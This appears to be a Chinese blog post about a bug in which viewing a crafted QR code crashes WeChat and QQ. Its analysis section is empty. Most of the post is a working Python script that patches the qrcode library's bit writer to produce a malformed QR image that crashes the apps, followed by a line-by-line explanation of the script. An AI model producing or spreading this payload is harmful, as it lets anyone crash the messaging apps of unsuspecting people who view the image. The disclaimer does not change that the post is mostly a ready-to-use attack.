震惊！QQ和微信出现1day漏洞！

免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。

0x00 前言

昨晚各大QQ群聊以及QQ空间，微信群聊，以及微信朋友圈传出一个1day漏洞，查看图片微信和QQ就崩溃，"只能看一眼，不能看多，因为再看一眼就爆炸"

0x01 漏洞分析

0x02 Bug图片

高清重制版图片

0x02 复现工具

微信QQ崩溃了？腾讯出现最新版二维码Bug,不知道问题在哪里。使用下面代码，轻松帮你复现。
1.安装qrcode

pip install qrcode

2.生成代码：
import qrcode
from qrcode.util import QRData, MODE_NUMBER, MODE_8BIT_BYTE

def nvwu_put(self, num, length):
    if num == 0:
        num = 233
    for i in range(length):
        self.put_bit(((num >> (length - i - 1)) & 1) == 1)

qrcode.util.BitBuffer.put = nvwu_put

def QR_input():
    qr = qrcode.QRCode(2, qrcode.constants.ERROR_CORRECT_M, mask_pattern=0)

    num_data = QRData('1145141', MODE_NUMBER)
    data = QRData(b'.', MODE_8BIT_BYTE)
    hack_data = QRData(b'', MODE_8BIT_BYTE)

    qr.add_data(num_data)
    qr.add_data(data)
    qr.add_data(num_data)
    qr.add_data(data)
    qr.add_data(num_data)
    qr.add_data(data)
    qr.add_data(num_data)

    qr.add_data(hack_data)

    img = qr.make_image()
    img.save("./input.png")

if __name__ == "__main__":
    QR_input()

上面的代码做了以下工作：

1. 创建一个新的QR码，纠错等级为M，掩码模式为0。

2. 创建一个新的QR数据，字符串为'1145141'，模式为MODE_NUMBER。

3. 创建一个新的QR数据，字符串为'.'，模式为MODE_8BIT_BYTE。

4. 创建一个新的QR数据，字符串为空，模式为MODE_8BIT_BYTE。